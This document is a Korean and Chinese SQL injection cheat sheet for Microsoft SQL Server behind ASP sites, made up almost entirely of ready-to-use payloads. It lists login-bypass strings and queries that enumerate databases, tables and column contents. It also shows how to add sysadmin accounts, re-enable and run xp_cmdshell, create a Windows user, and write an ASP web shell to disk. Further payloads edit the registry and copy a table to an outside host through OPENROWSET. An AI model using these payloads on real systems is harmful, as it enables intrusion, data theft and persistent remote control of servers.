SQL Injection 기법 정리 #2

1. 인젝선 기본

1.http://xxx.xxx.xxx?id=1 and [조회]
select * from table where id=1 and [조회]

2.http://xxx.xxx.xxx?name=test' and [조회] and ''='
select * from table where name='test' and [조회] and ''=''

3.http://xxx.xxx.xxx?query=' and [조회] and '%25'='
select * from table where query like '%' and [조회] and '%'='%'

 1)' or''='
 2) ' or 1=1--
 3) ' or 'a'='a--
 4) 'or'='or'
 5) " or 1=1--
 6）or 1=1--
 7） or 'a='a
 8）" or "a"="a
 9） ') or ('a'='a
10） ") or ("a"="a
11） ） or (1=1

2. 데이터베이스 정보 조회

0.버전 확인
and 1=(select @@VERSION)

http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)

1.권한 확인
1)서버 역할의 멤버:
and 1=(IS_SRVROLEMEMBER('sysadmin'))
sysadmin，dbcreator，diskadmin，processadmin，serveradmin，setupadmin，securityadmin
2)데이타베이스 역할의 멤버:
and 1=(IS_MEMBER('db_owner'))
3)判断是否支持多句执行
;declare @a int;--

2.DB이름 확인

and 0<>db_name()

http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name()

3.사용자 확인

and user>0

4.得到库名
sysdatabases内dbid为1-6的是系统自建表
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)

5.得到表名
and 0<>(select top 1 name from master.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top 10 * name from master.dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')

6.得到字段名
1）得到表的id
and 0<>(select count(*) from master.dbo.sysobjects where xtype='U' and name=char(97)%2Bchar(98)%2Bchar(99) and uid>(str(id)))
2)用得到的id查询列
and 0<>(select top 1 name from master.dbo.syscolumns where id=235147883)
and 0<>(select top 1 name from (select top 10 name from master.dbo.syscolumns where id=235147883 order by name asc) as table1 order by name desc)

7.得到字段内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名)
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名 where 字段名 not in('已得到内容'))
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)

3. 기타 정보

0.계정 정보 변경
;exec sp_addlogin '아이디', '패스워드';--
;exec sp_password '이전 패스워드', '새로운 패스워드', '아이디';--
;exec master.dbo.sp_addsrvrolemember '아이디' 'sysadmin';--
;exec sp_droplogin '아이디';--

1.cmd 명령어
1)xp_cmdshell 프로시저 등록
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
;exec master.dbo.sp_dropextendedproc 'xp_cmdshell';--
;dbcc addextendedproc ("xp_cmdshell","xplog70.dll");--
2)xp_cmdshell 실행
;exec master..xp_cmdshell 'ping 111.222.333.444';--
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\';--
;exec master..xp_cmdshell 'echo 要写入内容>>绝对路径';--
3)回显
;Drop table cmd_list ;CREATE TABLE cmd_list (ComResult nvarchar(8000)) INSERT cmd_list EXEC MASTER..xp_cmdshell 'ipconfig -all';--
and (select char(94)+cast(count(1) as varchar(8000))+char(94) from comd_list where 1=1)>0

2.윈도우 서비스 제어
;exec master.dbo.xp_servicecontrol 'start', 'schedule';--

3.利用SP_OAcreate,SP_OAMETHOD执行对象
1)복원
;exec master.dbo.sp_addextendedproc 'sp_OACreate','odsole70.dll';--
;dbcc addextendedproc ("sp_OACreate","odsole70.dll");--
2)실행
;DECLARE @o INT EXEC SP_OAcreate 'wscript.shell',@o OUT EXEC SP_OAMETHOD @o,'run',null, 'J:\WINDOWS\system32\cmd.exe /c net user aaa3 /add';--
;declare @o int,@f int exec sp_oacreate 'scripting.filesystemobject',@o out exec sp_oamethod @o,'createtextfile',@f out,'j:\foo5.asp',1 exec sp_oamethod @f,'writeline',NULL,'<% set o=server.createobject("wscript.shell")' exec sp_oamethod @f,'writeline',NULL,'o.run(request.querystring("cmd")) %>'

4.浏览目录
1)创建临时表
;create table temp1(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
2)获得当前所有驱动器
;insert temp1(id,num1,num2,num3) exec master.dbo.xp_availablemedia;--
3)获得当前子目录列表
;insert into temp(id,num1) exec master.dbo.xp_subdirs 'c:\';--
4)获得所有子目录的目录树结构
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
5)搜索文件
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
6)读取表中内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)

5.从文件导入到表中
;create table 表名(line varchar(8000));--
;bulk insert 表名 from '绝对路径';--

6.레지스트리 제어

1)레지스트리 값 exec xp_regenumvalues
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run';--
2)레지스트리 키 xp_regread
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir';--
3)레지스트리 쓰기 xp_regwrite
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_SZ','hello';--
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_DWORD','6';-- 
4)레지스트리 값 삭제 xp_regdeletevalue
;exec master.dbo.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName';--
5)레지스트리 키 삭제 xp_regdeletekey
;exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey';--

7.기타 유용한 프로시저
xp_msver       Microsoft SQL Server 정보
xp_enumdsn      ODBC 정보
xp_ntsec_enumdomains 도메인정보
xp_logininfo     Microsoft SQL Server 로그인 정보
sp_configure     컨피그레이션
sp_helpextendedproc  프로시저 리스트

4. 复制远程数据库(反向连接)
;insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=password;Network=DBMSSOCN;Address=111.222.333.444,1433;', 'select * from dest_table') select * from src_table;--

5. 备份数据库
1)首次完整备份
;backup database 데이터베이스 to disk='경로';--
2)差异备份，生成文件较小
;backup database 데이터베이스 to disk='경로' WITH DIFFERENTIAL,FORMAT;--

그외 자료

http://www.linuxforum.net/forum/showflat.php?Cat=&Board=security&Number=581860&page=0&view=collapsed&sb=5&o=31&fpart